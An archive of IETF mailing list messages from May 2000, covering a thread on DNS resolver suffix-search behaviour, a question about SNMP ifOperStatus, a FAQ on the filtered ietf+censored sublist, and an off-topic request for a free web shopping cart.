Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta1/8.11.0.Beta1) with ESMTP id e4V3mM931162;
Tue, 30 May 2000 23:48:22 -0400
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: Re: Cite on DNS-related traffic.
In-reply-to: Your message of "Tue, 30 May 2000 23:33:13 EDT."
<00053023364500.02459@intruder>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<00053023364500.02459@intruder>
Date: Tue, 30 May 2000 23:48:21 -0400
X-Loop: [EMAIL PROTECTED]
On Tue, 30 May 2000 23:33:13 EDT, Garreth Jeremiah said:
> Excuse me if this is answering the wron question here, but.....
> This is just cycling through the clients "DNS Suffix search order", which is
> clearly set to: dept.other.edu
Yes. However, it's unclear (to me, at least) whether either
of the following should be true by default:
a) That it should try 'other.edu' and 'edu', if suffixing with the
given suffix fails.
b) That it should do any rewriting at all if there's a '.' already
in the name.
Yes, I know that you need both of these to make 'foobar.chem'
resolve to 'foobar.chem.other.edu' if you're in a *.phys.other.edu
subnet... But there's gotta be a way to avoid this behavior as
a default...
/Valdis (who thinks things would work a LOT better overall if everybody
just kept their machines configured right and installed recent patches
once a year or so.... ;)
>From owner-ietf-outbound Wed May 31 12:30:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA15738
for [EMAIL PROTECTED]; Wed, 31 May 2000 12:30:02 -0400 (EDT)
Received: from boreas.isi.edu (boreas.isi.edu [128.9.160.161])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA15549
for <[EMAIL PROTECTED]>; Wed, 31 May 2000 12:24:44 -0400 (EDT)
Received: from isi.edu (sci.isi.edu [128.9.160.93])
by boreas.isi.edu (8.8.7/8.8.6) with ESMTP id JAA05262;
Wed, 31 May 2000 09:23:15 -0700 (PDT)
Message-ID: <[EMAIL PROTECTED]>
Date: Wed, 31 May 2000 09:22:26 -0700
From: Joe Touch <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.7 [en] (Win98; U)
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: [EMAIL PROTECTED]
CC: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Cite on DNS-related traffic.
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<00053023364500.02459@intruder>
<[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
[EMAIL PROTECTED] wrote:
>
> On Tue, 30 May 2000 23:33:13 EDT, Garreth Jeremiah said:
> > Excuse me if this is answering the wron question here, but.....
> > This is just cycling through the clients "DNS Suffix search order", which is
> > clearly set to: dept.other.edu
Not necessarily. Resolvers also get this information from the
host's current fully-qualified name.
> ...However, it's unclear (to me, at least) whether either
> of the following should be true by default:
>
> a) That it should try 'other.edu' and 'edu', if suffixing with the
> given suffix fails.
>
> b) That it should do any rewriting at all if there's a '.' already
> in the name.
>
> Yes, I know that you need both of these to make 'foobar.chem'
> resolve to 'foobar.chem.other.edu' if you're in a *.phys.other.edu
> subnet... But there's gotta be a way to avoid this behavior as
> a default...
It may be useful to distinguish resolver behavior from browser behavior.
If the host has no more specific (explicit) resolver information,
the current fully-qualified hostname, minus the first component,
is used as the 'working suffix'. Attempts are made, with increasing
generality, to use this suffix on any partially qualified request.
This explains:
- why it starts with dept.other.edu as the trailer
- why it retries with increasingly general variants
In at least one resolver (FreeBSD, by quick check), there's a parameter
called 'ndots' - if the request contains that number of dots (defaulted
to 1), the request is supposed to happen as if already fully qualified.
This can be overridden by appending a '.' to the name, explicitly
indicating that it is already fully qualified.
I would be curious to see if your lookup was as inefficient on
'www.netscape.com.'
Joe
>From owner-ietf-outbound Wed May 31 14:01:45 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA18246
for [EMAIL PROTECTED]; Wed, 31 May 2000 14:00:03 -0400 (EDT)
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA17983
for <[EMAIL PROTECTED]>; Wed, 31 May 2000 13:52:48 -0400 (EDT)
Received: (from wollman@localhost)
by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA34271;
Wed, 31 May 2000 13:52:47 -0400 (EDT)
(envelope-from wollman)
Date: Wed, 31 May 2000 13:52:47 -0400 (EDT)
From: Garrett Wollman <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Cite on DNS-related traffic.
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<00053023364500.02459@intruder>
<[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
<<On Tue, 30 May 2000 23:48:21 -0400, [EMAIL PROTECTED] said:
> Yes. However, it's unclear (to me, at least) whether either
> of the following should be true by default:
> a) That it should try 'other.edu' and 'edu', if suffixing with the
> given suffix fails.
This should not be true, but is historic behavior on the part of
several very common resolvers. (Particularly, this is the behavior
one gets with an old BSD resolver all the time, or with a newer BSD
resolver when it's misconfigured.)
Have a look at
<http://khavrinen.lcs.mit.edu/wollman/dns-cache-week.png> and
<http://khavrinen.lcs.mit.edu/wollman/dns-errors-week.png> for an
interesting look at what one of our major resolvers does. (For
hysterical raisins, our main name servers have historically been
name-resolution servers for low-end clients.) (Yes, I know that
``lame server'' is not an actual DNS protocol error, it's a
configuration error, but the operational result is the same: we sent a
query and got an unhelpful response.)
-GAWollman
--
Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same
[EMAIL PROTECTED] | O Siem / The fires of freedom
Opinions not those of| Dance in the burning flame
MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick
>From owner-ietf-outbound Wed May 31 14:10:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA18666
for [EMAIL PROTECTED]; Wed, 31 May 2000 14:10:02 -0400 (EDT)
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA18051
for <[EMAIL PROTECTED]>; Wed, 31 May 2000 13:55:55 -0400 (EDT)
Received: (from wollman@localhost)
by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA34288;
Wed, 31 May 2000 13:55:42 -0400 (EDT)
(envelope-from wollman)
Date: Wed, 31 May 2000 13:55:42 -0400 (EDT)
From: Garrett Wollman <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: Cite on DNS-related traffic.
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
<<On Tue, 30 May 2000 22:45:44 -0400, [EMAIL PROTECTED] said:
> No, I don't know why I got the last one, as I'm only answering for
> 'other.edu'. Perhaps the host doing the queries had a sudden fit
> of inspiration, saw my machine as an NS for its domain, and guessed.
Many people mistakenly assume that any name server which serves their
domain can be configured in their stub resolver. Recent versions of
BIND can be configured to answer ``no'' to such queries. (We don't
want to do that here because there are far too many clients to be
changed, almost none of which use DHCP.)
-GAWollman
>From owner-ietf-outbound Wed May 31 14:20:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA19116
for [EMAIL PROTECTED]; Wed, 31 May 2000 14:20:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA18229
for <[EMAIL PROTECTED]>; Wed, 31 May 2000 14:00:01 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta1/8.11.0.Beta1) with ESMTP id e4VHwe932082;
Wed, 31 May 2000 13:58:40 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: Joe Touch <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Cite on DNS-related traffic.
In-reply-to: Your message of "Wed, 31 May 2000 09:22:26 PDT."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]> <00053023364500.02459@intruder>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 31 May 2000 13:58:38 -0400
X-Loop: [EMAIL PROTECTED]
On Wed, 31 May 2000 09:22:26 PDT, Joe Touch said:
> I would be curious to see if your lookup was as inefficient on
> 'www.netscape.com.'
I have no idea - the DNS in question is an off-campus secondary run as
a favor for somebody - the university in question is about 9 hours drive
from here. As such, if they did an efficient lookup, I'd never see the
packet, so I dont know. ;)
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Wed May 31 15:40:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA21792
for [EMAIL PROTECTED]; Wed, 31 May 2000 15:40:03 -0400 (EDT)
Received: from mail3.cai.com (mail3.cai.com [141.202.248.42])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id PAA21676
for <[EMAIL PROTECTED]>; Wed, 31 May 2000 15:36:08 -0400 (EDT)
Received: by usilms52.cai.com with Internet Mail Service (5.5.2650.21)
id <MATY0YCA>; Wed, 31 May 2000 15:16:43 -0400
Message-ID: <[EMAIL PROTECTED]>
From: "Pawluk, Matthew" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: MIBII - ifOperStatus of 5
Date: Wed, 31 May 2000 15:17:08 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Can anyone inform me of what an ifOperStatus of 5 translates to?
Thanks in advance
Matthew Pawluk
Network Management Development
Computer Associates International, Inc.
Mail: [EMAIL PROTECTED]
Tel: +1 (631) 342-3753
1 Computer Associates Plaza
Islandia, NY 11788
USA
>From owner-ietf-outbound Wed May 31 19:20:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA26934
for [EMAIL PROTECTED]; Wed, 31 May 2000 19:20:02 -0400 (EDT)
Received: from dokka.maxware.no (dokka.maxware.no [195.139.236.69])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA26893
for <[EMAIL PROTECTED]>; Wed, 31 May 2000 19:15:01 -0400 (EDT)
Received: (from hta@localhost)
by dokka.maxware.no (8.9.3/8.9.3) id BAA23019
for [EMAIL PROTECTED]; Thu, 1 Jun 2000 01:15:02 +0200
Date: Thu, 1 Jun 2000 01:15:02 +0200
From: Harald Tveit Alvestrand <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: FAQ: The IETF+Censored list
X-Loop: [EMAIL PROTECTED]
The IETF+Censored mailing list
At times, the IETF list is subject to debates that have little to do
with the purposes for which the IETF list was created. Some people
would appreciate a "quieter" forum for the relevant debates that take
place, but the IETF's policy of openness has so far prevented the IETF
from imposing any censorship policy on the [EMAIL PROTECTED] list.
To give people an alternative, there is a list called
"[EMAIL PROTECTED]".
This list is a sublist (that is, it gets the same messages as) the
open IETF discussion list. However, this list will not forward all
messages; in particular, the filters have been set so that persons and
discussions that are, in the view of Harald Alvestrand, irrelevant to
the IETF list are not forwarded.
Because this filter is automated, the criteria include:
* Well known troublemakers
* Well known crosspostings
* Subjects that have led to recent non-conclusive exchanges
* Some ways to say "unsubscribe"
To join the list, [1]send the word "subscribe" in the BODY of a
message to [EMAIL PROTECTED] (the URL here is an RFC
2368 mailto URL that does the Right Thing).
To unsubscribe, [2]send the word "unsubscribe" in the BODY of a
message to [EMAIL PROTECTED] Do not send to the
list - your message will be filtered!
(members of the main IETF list itself must follow instructions for
that list, of course. You are only a member of ietf+censored if there
is a comment on the bottom of your IETF list mail saying that the
message has been sent through the ietf+censored list.)
For fun, there is a special list for the rejected messages:
[EMAIL PROTECTED] - subscribe in the same fashion,
by [3]mail to [EMAIL PROTECTED]
By public request, the current set of filters are listed at
[4]http://www.alvestrand.no/cgi-bin/hta/ietf+censored-filters
Some statistics on postings, which may be useful in getting a
perspective on the effects of the filter, are at
[5]posting-counts.html (started Oct 14, 1998).
This page is http://www.alvestrand.no/ietf+censored.html, and is
posted monthly in text form to [EMAIL PROTECTED]
_________________________________________________________________
Harald Tveit Alvestrand [6]< [EMAIL PROTECTED]>
References
1. mailto:[EMAIL PROTECTED]?body=subscribe
2. mailto:[EMAIL PROTECTED]?body=unsubscribe
3. mailto:[EMAIL PROTECTED]?body=subscribe
4. http://www.alvestrand.no/cgi-bin/hta/ietf+censored-filters
5. http://www.alvestrand.no/posting-counts.html
6. mailto:[EMAIL PROTECTED]
>From owner-ietf-outbound Wed May 31 20:00:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA27734
for [EMAIL PROTECTED]; Wed, 31 May 2000 20:00:02 -0400 (EDT)
Received: from WVNVM.WVNET.EDU (wvnvm.wvnet.edu [129.71.2.4])
by ietf.org (8.9.1a/8.9.1a) with SMTP id TAA27605
for <[EMAIL PROTECTED]>; Wed, 31 May 2000 19:53:51 -0400 (EDT)
Received: from gsa00315 [129.71.230.102] by WVNVM.WVNET.EDU (IBM VM SMTP Level 310)
via TCP with SMTP ; Wed, 31 May 2000 19:54:03 EDT
From: "John Lambey" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: Free Shopping Cart
Date: Wed, 31 May 2000 19:53:28 -0400
Message-ID: <01bfcb5b$6c12d820$66e64781@gsa00315>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.71.1712.3
X-MimeOLE: Produced By Microsoft MimeOLE V4.71.1712.3
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Hello
Can you tell me where to get a free shopping cart for my web page?
Thanks!
Cat's Candles
http://www.geocities.com/catscandles
